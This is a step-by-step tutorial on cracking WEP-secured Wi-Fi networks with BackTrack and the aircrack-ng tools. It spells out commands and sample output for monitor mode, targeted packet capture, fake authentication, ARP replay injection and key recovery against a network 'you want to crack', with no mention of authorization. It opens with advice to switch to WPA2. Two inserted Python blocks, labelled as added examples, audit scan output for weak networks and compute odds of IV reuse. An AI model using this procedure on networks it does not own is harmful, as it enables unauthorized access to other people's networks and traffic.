This tutorial walks you through a step-by-step procedure to crack a WEP-secured wireless network. WEP is really easy to crack. Not many WEP-secured routers are found nowadays; almost everybody has moved to WPA/WPA2-PSK. So after reading this post I strongly advise you to change your wireless security setting to WPA or WPA2-PSK.
What You’ll need
The process is quite simple and anyone can do it, but you have to be patient for a while, an hour or so.
- BackTrack OS. BackTrack is a bootable Linux distribution with lots of pen-testing tools and is needed for almost all my tutorials. So, if you have not installed it, please read this article on how to install it.
- A compatible wireless network adapter: one that receives a good signal from the target access point and is capable of injecting packets. If you are live-booting BackTrack the internal adapter will work, but I still recommend an external wireless adapter, which is more powerful and picks up more signal from the access point.
Let’s get started
Step 1: Boot into Backtrack.
You can use any method to boot into BackTrack: live CD, VMware, dual boot, etc. Just boot it into GUI mode and open a new console (command line) from the taskbar.
Step 2: Execute the below command to see the list of your network interfaces.
airmon-ng
My wireless network card interface is wlan0 and yours will probably be the same. Please note the interface name.
Note: To connect your wireless network card to VMware, first plug it into a USB port; you will then see a small USB icon, as in the figure, in the top right of VMware. Right-click it and click Connect. The USB icon will then turn green and start to glow.
Step 3: Enable the monitor mode.
To enable monitor mode, run the following command, where (interface) is your wireless network interface name, e.g. wlan0.
airmon-ng start (interface)
In my case,
airmon-ng start wlan0
Step 4: Let’s start airodump
The card is now running in monitor mode. To search for wireless networks around you, execute the following command.
airodump-ng mon0
Here you will see all the wireless networks in range. Note the BSSID and channel of the ESSID (wireless network) you want to crack. The lower the number in the PWR column, the closer you are to that network. When you have found it, hit Ctrl+C to stop the scan and enter the following:
airodump-ng --bssid (AP BSSID address) -c (channel no) -w (file name you want to save with) (monitor interface)
And, in my case it will be
airodump-ng --bssid 54:E6:FC:F0:AC:FC -c 1 -w Ehackwifi mon0
Then the screen will look like this:
NOTE: I think this attack works best if you see a STATION in the next screen and the number in the DATA column is increasing. It is not compulsory, but if you cannot crack the key, I recommend you wait for a client to connect.
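The scan from Step 4 is also the quickest way to audit your own environment for the problem this post opens with. The following is an added example, not code from the original post or from the aircrack-ng project: it parses the CSV file that airodump-ng -w writes next to the .cap (AP table, blank line, station table) and lists every AP still running WEP or no encryption, ranking WEP networks with associated clients highest because those are exactly the ones that produce the DATA traffic the rest of this post relies on. The CSV content, BSSIDs and ESSIDs below are constructed.

```python
import csv
import io

# Constructed airodump-ng CSV dump (not a real capture): AP table, blank line,
# station table, each with a header row, as airodump-ng -w writes them.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2013-03-01 09:00:00, 2013-03-01 09:05:00,  1,  54, WEP , WEP, OPN, -41,  120, 3500,   0.  0.  0.  0,   9, OfficeOld,
00:11:22:33:44:66, 2013-03-01 09:00:00, 2013-03-01 09:05:00,  6,  54, WPA2, CCMP, PSK, -55,   98,    0,   0.  0.  0.  0,   9, OfficeNew,
00:11:22:33:44:77, 2013-03-01 09:00:00, 2013-03-01 09:05:00, 11,  54, OPN ,     ,    , -70,   40,    0,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2013-03-01 09:01:00, 2013-03-01 09:05:00, -50,  800, 00:11:22:33:44:55, OfficeOld
AA:BB:CC:DD:EE:02, 2013-03-01 09:02:00, 2013-03-01 09:05:00, -60,   40, (not associated), OfficeOld,Guest
"""

def _table(section):
    """Parse one airodump-ng CSV section into dicts keyed by its header row."""
    rows = [[c.strip() for c in r] for r in csv.reader(io.StringIO(section)) if r]
    header, body = rows[0], rows[1:]
    out = []
    for r in body:
        if len(r) > len(header):  # probed ESSIDs may themselves contain commas
            r = r[:len(header) - 1] + [",".join(r[len(header) - 1:])]
        out.append(dict(zip(header, r)))
    return out

def audit_scan(text):
    """Return APs still using WEP or no encryption, most exposed first."""
    ap_part, _, sta_part = text.partition("\n\n")
    aps, stations = _table(ap_part), _table(sta_part)
    clients = {}
    for s in stations:  # count associated clients per BSSID
        clients[s["BSSID"]] = clients.get(s["BSSID"], 0) + 1
    findings = []
    for ap in aps:
        priv, n = ap["Privacy"], clients.get(ap["BSSID"], 0)
        if priv.startswith("WEP"):
            # WEP with active clients is the traffic-rich case the post relies on
            severity = "high" if n else "medium"
        elif priv == "OPN":
            severity = "info"
        else:
            continue  # WPA/WPA2 networks are not flagged here
        findings.append({"bssid": ap["BSSID"], "essid": ap["ESSID"],
                         "channel": int(ap["channel"]), "privacy": priv,
                         "clients": n, "ivs": int(ap["# IV"]), "severity": severity})
    return sorted(findings, key=lambda f: ["high", "medium", "info"].index(f["severity"]))
```

Point audit_scan at the contents of your own (file name)-01.csv to get the list of networks that need moving to WPA2-PSK.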
Step 5: Packet Injection test
This step is optional; it checks the range between your wireless card and the AP and whether the card can inject packets. To do so, enter the following:
aireplay-ng -9 -e (essid) -a (AP BSSID address) mon0
If everything is right then it should prompt you:
09:23:35 Waiting for beacon frame (BSSID: 11:22:33:44:55:66) on channel 1
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP
09:23:37 Trying directed probe requests...
09:23:37 11:22:33:44:55:66 - channel: 1 - 'essid'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%
Look at the last line. It should say 100% or close to it. If it is low, you are either too far away from the AP or too close to it. If it is zero, injection will not work.
Step 6: Let’s do a fake authentication to associate with AP
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. The lack of association with the access point is the single biggest reason why injection fails.
So, enter the following command in a new console to do a fake authentication and get associated.
aireplay-ng -1 0 -e (essid) -a (AP BSSID address) mon0
A successful attempt will look like the following picture.
And a failed authentication looks like:
18:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request
Look at the “Got a deauthentication packet!” line and the continuous retries after it. Do not proceed to the next step until you have the fake authentication working correctly.
Step 7: ARP request replay mode
The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.
Again, open another console and type the following:
aireplay-ng -3 -b (AP BSSID address) mon0
Now it will listen for ARP requests, and when it hears one, aireplay-ng will immediately start to inject it. If it stays stuck for a long time without injecting, you may try connecting another wireless card (your laptop’s internal one) to the AP with any password, or sending deauthentication packets to the AP, to make it work. I do not know why, but it has worked for me a few times. The screen should look like the one below once it starts to inject:
You will notice a rapid increase in the DATA column of the airodump-ng screen. The more you get, the better. 50,000 would be enough, but you can also try to crack it at 20,000, which is what we are going to do in the next step.
Note: If you receive a message similar to “Got a deauth/disassoc packet. Is the source mac associated?”, this means you have lost association with the AP and all your injected packets will be ignored. You must return to the fake authentication step (Step 6) and successfully associate with the AP.
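Why collecting IVs is the whole game: WEP prepends a 24-bit IV to every frame, so there are only 16,777,216 of them per key, and the same keystream is reused as soon as an IV repeats. The block below is an added example, not code from the original post or from aircrack-ng; it computes the birthday-bound chance of an IV repeat after a given number of frames and how long a busy AP needs to exhaust the whole IV space. It illustrates the size of the IV space, not the statistical key-recovery method aircrack-ng itself uses; the frame rate of 500/s is an assumed figure.

```python
import math

IV_SPACE = 1 << 24  # WEP's 24-bit IV: only 16,777,216 distinct values per key


def iv_reuse_probability(frames, iv_space=IV_SPACE):
    """P(at least one IV repeats) after `frames` frames, if each sender picks IVs
    uniformly at random. That is the best case for WEP: a card that simply counts
    up from zero is guaranteed to repeat once the counter wraps. The exact
    birthday product is evaluated in log space so it does not underflow."""
    if frames > iv_space:
        return 1.0  # pigeonhole: more frames than IVs
    log_no_repeat = sum(math.log1p(-i / iv_space) for i in range(frames))
    return 1.0 - math.exp(log_no_repeat)


def frames_for_probability(p, iv_space=IV_SPACE):
    """Birthday-bound estimate of the frame count at which P(repeat) reaches p."""
    return math.ceil(math.sqrt(2 * iv_space * math.log(1 / (1 - p))))


def hours_to_exhaust(frames_per_second, iv_space=IV_SPACE):
    """Hours until a sequential-IV sender has used every IV at a given frame rate."""
    return iv_space / frames_per_second / 3600


if __name__ == "__main__":
    # 20,000 and 50,000 are the targets the post works with
    for n in (1_000, 4_823, 20_000, 50_000):
        print(f"{n:>6} frames: P(IV reuse) = {iv_reuse_probability(n):.4f}")
    print("frames for a 50% chance of IV reuse:", frames_for_probability(0.5))
    # assumed rate of 500 frames/s for a busy access point
    print("hours to exhaust all IVs at 500 frames/s:", round(hours_to_exhaust(500), 2))
```

A few thousand frames already give even odds of a repeated IV, and a busy AP cycles through every IV in well under a day, which is the reason to move to WPA2-PSK rather than rely on WEP with a longer key.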
Final Step: Aircrack-ng to obtain WEP key
Now, after you have collected a lot of data, you can start the cracking process; leave the ARP request console running so that more data keeps coming in if there is not enough. Enter the following command to run the cracking process.
aircrack-ng -b (bssid) (file name-01.cap)
Here, file name is the one you entered with “-w” in the airodump-ng command in Step 4, plus the “-01.cap” suffix that BackTrack adds by default. You can also find the file by typing ls in a new console.
If everything worked, it will try to crack the password as shown in the figure and after a few moments it will show you the KEY.
Hope you like this tutorial! If you have any problem, please leave a comment.